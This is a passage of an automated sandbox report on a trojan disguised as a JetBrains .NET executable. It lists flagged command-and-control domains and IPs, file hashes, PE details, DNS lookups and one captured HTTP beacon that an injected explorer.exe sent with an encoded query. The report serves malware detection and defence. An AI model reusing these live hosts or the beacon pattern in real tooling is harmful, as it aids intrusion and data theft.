                                        http://www.sakkal.comexplorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        104.161.84.111
                                        www.intentguild.comUnited States
                                        53755IOFLOODUStrue
                                        154.214.84.117
                                        www.didyouswipe.comSeychelles
                                        134548DXTL-HKDXTLTseungKwanOServiceHKtrue

                                        General Information

                                        Joe Sandbox Version:32.0.0 Black Diamond
                                        Analysis ID:432733
                                        Start date:10.06.2021
                                        Start time:17:53:16
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 10m 4s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:GiG35Rwmz6 (renamed file extension from none to exe)
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:18
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@7/1@4/2
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 46.7% (good quality ratio 42.7%)
                                        • Quality average: 69.2%
                                        • Quality standard deviation: 32.3%
                                        HCA Information:
                                        • Successful, ratio: 97%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                        • Excluded IPs from analysis (whitelisted): 104.43.139.144, 20.82.209.183, 204.79.197.200, 13.107.21.200, 104.42.151.234, 92.122.145.220, 13.64.90.137, 20.75.105.140, 20.54.26.129, 92.122.213.194, 92.122.213.247, 20.82.210.154
                                        • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, eus2-consumerrp-displaycatalog-aks2aks-useast.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, skypedataprdcolwus17.cloudapp.net, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus16.cloudapp.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        17:54:13API Interceptor1x Sleep call for process: GiG35Rwmz6.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        No context

                                        Domains

                                        No context

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        IOFLOODUSOrder.exeGet hashmaliciousBrowse
                                        • 107.167.72.29
                                        XiTAmVLm88EpcSc.exeGet hashmaliciousBrowse
                                        • 23.226.65.164
                                        Shipment Document BLINV and packing list.exeGet hashmaliciousBrowse
                                        • 104.161.123.48
                                        Shipment Document BLINV and packing list.exeGet hashmaliciousBrowse
                                        • 104.161.123.48
                                        ESTATE LATE GOVENDER.docxGet hashmaliciousBrowse
                                        • 107.167.92.221
                                        XIYpA2JhpD.exeGet hashmaliciousBrowse
                                        • 107.178.78.108
                                        1bb71f86_by_Libranalysis.exeGet hashmaliciousBrowse
                                        • 107.167.92.221
                                        gCcAUOanux.exeGet hashmaliciousBrowse
                                        • 23.226.65.164
                                        KVYhrHPAgF.exeGet hashmaliciousBrowse
                                        • 104.161.54.152
                                        New Purchase Order.exeGet hashmaliciousBrowse
                                        • 104.161.87.36
                                        qdGS4VJVZD.exeGet hashmaliciousBrowse
                                        • 107.178.102.110
                                        HXHpRUwveo.exeGet hashmaliciousBrowse
                                        • 23.226.64.21
                                        Material Requisition for Quotation (MRQ).exeGet hashmaliciousBrowse
                                        • 107.189.162.104
                                        Pd0Tb0v0WW.exeGet hashmaliciousBrowse
                                        • 23.226.65.187
                                        LtfVNumoON.exeGet hashmaliciousBrowse
                                        • 23.226.65.187
                                        RCS76393.exeGet hashmaliciousBrowse
                                        • 104.161.84.100
                                        Betaling_advies.exeGet hashmaliciousBrowse
                                        • 107.178.109.19
                                        Statement of Account.xlsxGet hashmaliciousBrowse
                                        • 23.226.65.187
                                        Invoice.xlsxGet hashmaliciousBrowse
                                        • 23.226.65.187
                                        MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                        • 104.161.56.143
                                        DXTL-HKDXTLTseungKwanOServiceHKRFQ-21-QAI-OPS-0067 (7000000061).exeGet hashmaliciousBrowse
                                        • 154.84.83.5
                                        kmEVWJjPV6esObh.exeGet hashmaliciousBrowse
                                        • 45.203.107.209
                                        rtgs_pdf.exeGet hashmaliciousBrowse
                                        • 154.218.86.231
                                        Invoice number FV0062022020.exeGet hashmaliciousBrowse
                                        • 154.80.207.57
                                        MT103-payment confirmation.xlsxGet hashmaliciousBrowse
                                        • 154.84.76.49
                                        New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                        • 45.194.139.173
                                        17jLieeOPx.exeGet hashmaliciousBrowse
                                        • 156.237.130.173
                                        SKMBT41085NC9.exeGet hashmaliciousBrowse
                                        • 154.212.65.23
                                        Product_Samples.exeGet hashmaliciousBrowse
                                        • 154.95.193.124
                                        RE; KOC RFQ for Flangers - RFQ 22965431.exeGet hashmaliciousBrowse
                                        • 154.83.72.159
                                        RE KOC RFQ for Flanges - RFQ 2074898.exeGet hashmaliciousBrowse
                                        • 154.83.72.159
                                        item.exeGet hashmaliciousBrowse
                                        • 154.95.193.124
                                        Payment SWIFT_Pdf.exeGet hashmaliciousBrowse
                                        • 45.199.77.202
                                        Payment Advice-Pdf.exeGet hashmaliciousBrowse
                                        • 45.199.77.202
                                        Ack0527073465.exeGet hashmaliciousBrowse
                                        • 154.93.191.132
                                        PO#270521.pdf.exeGet hashmaliciousBrowse
                                        • 154.80.241.154
                                        List doc__Pdf.exeGet hashmaliciousBrowse
                                        • 156.238.108.75
                                        #U20ac9,770 pdf.exeGet hashmaliciousBrowse
                                        • 156.239.112.237
                                        Taisier Med Surgical Sutures.exeGet hashmaliciousBrowse
                                        • 45.199.37.6
                                        PO_0065-2021.exeGet hashmaliciousBrowse
                                        • 154.90.73.180

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GiG35Rwmz6.exe.log
                                        Process:C:\Users\user\Desktop\GiG35Rwmz6.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1314
                                        Entropy (8bit):5.350128552078965
                                        Encrypted:false
                                        SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                        MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                        SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                        SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                        SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.439544969133212
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:GiG35Rwmz6.exe
                                        File size:1116672
                                        MD5:b0901d0a6b90e6b371ba80e2c31ade52
                                        SHA1:2f175d971e4d6f4938083a78de9be10eb6ba0e05
                                        SHA256:08da4e7de40f2eec9cd1670e3db354d49d3101fd9ace7aaa5f99b235d2ce46ff
                                        SHA512:531e2494e065f083cfb8584365675ea5e85e7eac4668553423c50180be69fd7306667490300ed49ea86a95c6e4d6058e01e7feb594e68d3f416ad61ed3f55b8e
                                        SSDEEP:12288:kjuGIZRZkzHu3vmulMV40KJMp13ddUiJtYeYqHOqxiAwXSYhYQi32qNmTEdofxrh:kkGzihU31NddnYqueVK+cFWJGytwf
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...IG.`..............P.................. ... ....@.. .......................`............@................................

                                        File Icon

                                        Icon Hash:f0e1e0b2b2ccb2cc

                                        Static PE Info

                                        General

                                        Entrypoint:0x4e099e
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                        Time Stamp:0x60C14749 [Wed Jun 9 22:57:13 2021 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:v4.0.30319
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xe094c0x4f.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xe20000x31a38.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1140000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000xde9a40xdea00False0.778952528425data7.56086895782IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rsrc0xe20000x31a380x31c00False0.442878454774data6.16912000975IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x1140000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_ICON0xe22b00x99e7PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                        RT_ICON0xebc980x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                        RT_ICON0xfc4c00x94a8data
                                        RT_ICON0x1059680x5488data
                                        RT_ICON0x10adf00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 2130706432
                                        RT_ICON0x10f0180x25a8data
                                        RT_ICON0x1115c00x10a8data
                                        RT_ICON0x1126680x988data
                                        RT_ICON0x112ff00x468GLS_BINARY_LSB_FIRST
                                        RT_GROUP_ICON0x1134580x84data
                                        RT_VERSION0x1134dc0x370data
                                        RT_MANIFEST0x11384c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Version Infos

                                        DescriptionData
                                        Translation0x0000 0x04b0
                                        LegalCopyrightCopyright 2003 - 2021
                                        Assembly Version7.0.5.0
                                        InternalNameIDispatch.exe
                                        FileVersion7.0.5.0
                                        CompanyNameJet Brain Inc.
                                        LegalTrademarks
                                        Comments
                                        ProductNameJetBrain Assemblies
                                        ProductVersion7.0.5.0
                                        FileDescriptionJetBrain Assemblies
                                        OriginalFilenameIDispatch.exe

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        06/10/21-17:55:37.097047TCP1201ATTACK-RESPONSES 403 Forbidden8049763154.214.84.117192.168.2.4

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jun 10, 2021 17:55:15.886754036 CEST4975580192.168.2.4104.161.84.111
                                        Jun 10, 2021 17:55:16.073743105 CEST8049755104.161.84.111192.168.2.4
                                        Jun 10, 2021 17:55:16.073890924 CEST4975580192.168.2.4104.161.84.111
                                        Jun 10, 2021 17:55:16.074119091 CEST4975580192.168.2.4104.161.84.111
                                        Jun 10, 2021 17:55:16.261087894 CEST8049755104.161.84.111192.168.2.4
                                        Jun 10, 2021 17:55:16.261115074 CEST8049755104.161.84.111192.168.2.4
                                        Jun 10, 2021 17:55:16.261142969 CEST8049755104.161.84.111192.168.2.4
                                        Jun 10, 2021 17:55:16.261260986 CEST4975580192.168.2.4104.161.84.111
                                        Jun 10, 2021 17:55:16.261311054 CEST4975580192.168.2.4104.161.84.111
                                        Jun 10, 2021 17:55:16.448402882 CEST8049755104.161.84.111192.168.2.4
                                        Jun 10, 2021 17:55:36.540930986 CEST4976380192.168.2.4154.214.84.117
                                        Jun 10, 2021 17:55:36.817631960 CEST8049763154.214.84.117192.168.2.4
                                        Jun 10, 2021 17:55:36.817737103 CEST4976380192.168.2.4154.214.84.117
                                        Jun 10, 2021 17:55:36.817979097 CEST4976380192.168.2.4154.214.84.117
                                        Jun 10, 2021 17:55:37.096980095 CEST8049763154.214.84.117192.168.2.4
                                        Jun 10, 2021 17:55:37.097047091 CEST8049763154.214.84.117192.168.2.4
                                        Jun 10, 2021 17:55:37.097073078 CEST8049763154.214.84.117192.168.2.4
                                        Jun 10, 2021 17:55:37.098098040 CEST4976380192.168.2.4154.214.84.117
                                        Jun 10, 2021 17:55:37.098166943 CEST4976380192.168.2.4154.214.84.117
                                        Jun 10, 2021 17:55:37.374846935 CEST8049763154.214.84.117192.168.2.4

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jun 10, 2021 17:54:03.897207022 CEST53646468.8.8.8192.168.2.4
                                        Jun 10, 2021 17:54:04.128212929 CEST6529853192.168.2.48.8.8.8
                                        Jun 10, 2021 17:54:04.133364916 CEST5912353192.168.2.48.8.8.8
                                        Jun 10, 2021 17:54:04.187016964 CEST53652988.8.8.8192.168.2.4
                                        Jun 10, 2021 17:54:04.192693949 CEST53591238.8.8.8192.168.2.4
                                        Jun 10, 2021 17:54:04.962551117 CEST5453153192.168.2.48.8.8.8
                                        Jun 10, 2021 17:54:05.032048941 CEST53545318.8.8.8192.168.2.4
                                        Jun 10, 2021 17:54:06.427086115 CEST4971453192.168.2.48.8.8.8
                                        Jun 10, 2021 17:54:06.478573084 CEST53497148.8.8.8192.168.2.4
                                        Jun 10, 2021 17:54:07.461468935 CEST5802853192.168.2.48.8.8.8
                                        Jun 10, 2021 17:54:07.524126053 CEST53580288.8.8.8192.168.2.4
                                        Jun 10, 2021 17:54:07.610402107 CEST5309753192.168.2.48.8.8.8
                                        Jun 10, 2021 17:54:07.663794994 CEST53530978.8.8.8192.168.2.4
                                        Jun 10, 2021 17:54:08.878528118 CEST4925753192.168.2.48.8.8.8
                                        Jun 10, 2021 17:54:08.933176041 CEST53492578.8.8.8192.168.2.4
                                        Jun 10, 2021 17:54:09.834079027 CEST6238953192.168.2.48.8.8.8
                                        Jun 10, 2021 17:54:09.884396076 CEST53623898.8.8.8192.168.2.4
                                        Jun 10, 2021 17:54:10.768091917 CEST4991053192.168.2.48.8.8.8
                                        Jun 10, 2021 17:54:10.821561098 CEST53499108.8.8.8192.168.2.4
                                        Jun 10, 2021 17:54:11.886607885 CEST5585453192.168.2.48.8.8.8
                                        Jun 10, 2021 17:54:11.947751999 CEST53558548.8.8.8192.168.2.4
                                        Jun 10, 2021 17:54:13.187076092 CEST6454953192.168.2.48.8.8.8
                                        Jun 10, 2021 17:54:13.237911940 CEST53645498.8.8.8192.168.2.4
                                        Jun 10, 2021 17:54:14.133040905 CEST6315353192.168.2.48.8.8.8
                                        Jun 10, 2021 17:54:14.185241938 CEST53631538.8.8.8192.168.2.4
                                        Jun 10, 2021 17:54:15.645942926 CEST5299153192.168.2.48.8.8.8
                                        Jun 10, 2021 17:54:15.695879936 CEST53529918.8.8.8192.168.2.4
                                        Jun 10, 2021 17:54:17.012578964 CEST5370053192.168.2.48.8.8.8
                                        Jun 10, 2021 17:54:17.070967913 CEST53537008.8.8.8192.168.2.4
                                        Jun 10, 2021 17:54:18.915184021 CEST5172653192.168.2.48.8.8.8
                                        Jun 10, 2021 17:54:18.965190887 CEST53517268.8.8.8192.168.2.4
                                        Jun 10, 2021 17:54:19.847906113 CEST5679453192.168.2.48.8.8.8
                                        Jun 10, 2021 17:54:19.903249025 CEST53567948.8.8.8192.168.2.4
                                        Jun 10, 2021 17:54:20.752156973 CEST5653453192.168.2.48.8.8.8
                                        Jun 10, 2021 17:54:20.803582907 CEST53565348.8.8.8192.168.2.4
                                        Jun 10, 2021 17:54:21.871786118 CEST5662753192.168.2.48.8.8.8
                                        Jun 10, 2021 17:54:21.921684027 CEST53566278.8.8.8192.168.2.4
                                        Jun 10, 2021 17:54:22.799137115 CEST5662153192.168.2.48.8.8.8
                                        Jun 10, 2021 17:54:22.849612951 CEST53566218.8.8.8192.168.2.4
                                        Jun 10, 2021 17:54:23.725646019 CEST6311653192.168.2.48.8.8.8
                                        Jun 10, 2021 17:54:23.777753115 CEST53631168.8.8.8192.168.2.4
                                        Jun 10, 2021 17:54:24.663191080 CEST6407853192.168.2.48.8.8.8
                                        Jun 10, 2021 17:54:24.713352919 CEST53640788.8.8.8192.168.2.4
                                        Jun 10, 2021 17:54:38.403340101 CEST6480153192.168.2.48.8.8.8
                                        Jun 10, 2021 17:54:38.463588953 CEST53648018.8.8.8192.168.2.4
                                        Jun 10, 2021 17:55:06.856198072 CEST6172153192.168.2.48.8.8.8
                                        Jun 10, 2021 17:55:07.005012989 CEST53617218.8.8.8192.168.2.4
                                        Jun 10, 2021 17:55:08.867978096 CEST5125553192.168.2.48.8.8.8
                                        Jun 10, 2021 17:55:09.092139959 CEST53512558.8.8.8192.168.2.4
                                        Jun 10, 2021 17:55:10.048212051 CEST6152253192.168.2.48.8.8.8
                                        Jun 10, 2021 17:55:10.111740112 CEST53615228.8.8.8192.168.2.4
                                        Jun 10, 2021 17:55:11.008630991 CEST5233753192.168.2.48.8.8.8
                                        Jun 10, 2021 17:55:11.062864065 CEST53523378.8.8.8192.168.2.4
                                        Jun 10, 2021 17:55:12.465064049 CEST5504653192.168.2.48.8.8.8
                                        Jun 10, 2021 17:55:12.526832104 CEST53550468.8.8.8192.168.2.4
                                        Jun 10, 2021 17:55:13.595782042 CEST4961253192.168.2.48.8.8.8
                                        Jun 10, 2021 17:55:13.658582926 CEST53496128.8.8.8192.168.2.4
                                        Jun 10, 2021 17:55:13.945862055 CEST4928553192.168.2.48.8.8.8
                                        Jun 10, 2021 17:55:14.016227007 CEST53492858.8.8.8192.168.2.4
                                        Jun 10, 2021 17:55:14.475907087 CEST5060153192.168.2.48.8.8.8
                                        Jun 10, 2021 17:55:14.539922953 CEST53506018.8.8.8192.168.2.4
                                        Jun 10, 2021 17:55:15.807821035 CEST6087553192.168.2.48.8.8.8
                                        Jun 10, 2021 17:55:15.880664110 CEST53608758.8.8.8192.168.2.4
                                        Jun 10, 2021 17:55:15.952099085 CEST5644853192.168.2.48.8.8.8
                                        Jun 10, 2021 17:55:16.019619942 CEST53564488.8.8.8192.168.2.4
                                        Jun 10, 2021 17:55:17.335041046 CEST5917253192.168.2.48.8.8.8
                                        Jun 10, 2021 17:55:17.398087025 CEST53591728.8.8.8192.168.2.4
                                        Jun 10, 2021 17:55:17.510993004 CEST6242053192.168.2.48.8.8.8
                                        Jun 10, 2021 17:55:17.574400902 CEST53624208.8.8.8192.168.2.4
                                        Jun 10, 2021 17:55:18.148736000 CEST6057953192.168.2.48.8.8.8
                                        Jun 10, 2021 17:55:18.209038019 CEST53605798.8.8.8192.168.2.4
                                        Jun 10, 2021 17:55:36.476860046 CEST5018353192.168.2.48.8.8.8
                                        Jun 10, 2021 17:55:36.539633989 CEST53501838.8.8.8192.168.2.4
                                        Jun 10, 2021 17:55:48.654230118 CEST6153153192.168.2.48.8.8.8
                                        Jun 10, 2021 17:55:48.721448898 CEST53615318.8.8.8192.168.2.4
                                        Jun 10, 2021 17:55:50.053525925 CEST4922853192.168.2.48.8.8.8
                                        Jun 10, 2021 17:55:50.122462988 CEST53492288.8.8.8192.168.2.4
                                        Jun 10, 2021 17:55:57.294620991 CEST5979453192.168.2.48.8.8.8
                                        Jun 10, 2021 17:55:57.357387066 CEST53597948.8.8.8192.168.2.4
                                        Jun 10, 2021 17:56:17.508779049 CEST5591653192.168.2.48.8.8.8
                                        Jun 10, 2021 17:56:17.573081970 CEST53559168.8.8.8192.168.2.4

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        Jun 10, 2021 17:55:15.807821035 CEST192.168.2.48.8.8.80x47e2Standard query (0)www.intentguild.comA (IP address)IN (0x0001)
                                        Jun 10, 2021 17:55:36.476860046 CEST192.168.2.48.8.8.80x7713Standard query (0)www.didyouswipe.comA (IP address)IN (0x0001)
                                        Jun 10, 2021 17:55:57.294620991 CEST192.168.2.48.8.8.80xba0Standard query (0)www.uebfaushb.comA (IP address)IN (0x0001)
                                        Jun 10, 2021 17:56:17.508779049 CEST192.168.2.48.8.8.80xcbfbStandard query (0)www.hometheaterplanning.comA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        Jun 10, 2021 17:55:15.880664110 CEST8.8.8.8192.168.2.40x47e2No error (0)www.intentguild.com104.161.84.111A (IP address)IN (0x0001)
                                        Jun 10, 2021 17:55:36.539633989 CEST8.8.8.8192.168.2.40x7713No error (0)www.didyouswipe.com154.214.84.117A (IP address)IN (0x0001)
                                        Jun 10, 2021 17:55:57.357387066 CEST8.8.8.8192.168.2.40xba0Name error (3)www.uebfaushb.comnonenoneA (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • www.intentguild.com
                                        • www.didyouswipe.com

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.449755104.161.84.11180C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Jun 10, 2021 17:55:16.074119091 CEST1907OUTGET /n8ud/?vPE=5jrT8R0&hL=WvvELDNeXjXNSBNWuUY8Zfoe6Ppc+GsA8iptXd2KegdndXiZdpjCN7GBAWkC1K0OIvRU HTTP/1.1
                                        Host: www.intentguild.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Jun 10, 2021 17:55:16.261115074 CEST1909INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Thu, 10 Jun 2021 15:55:40 GMT
                                        Content-Type: text/html
                                        Content-Length: 146
                                        Connection: close
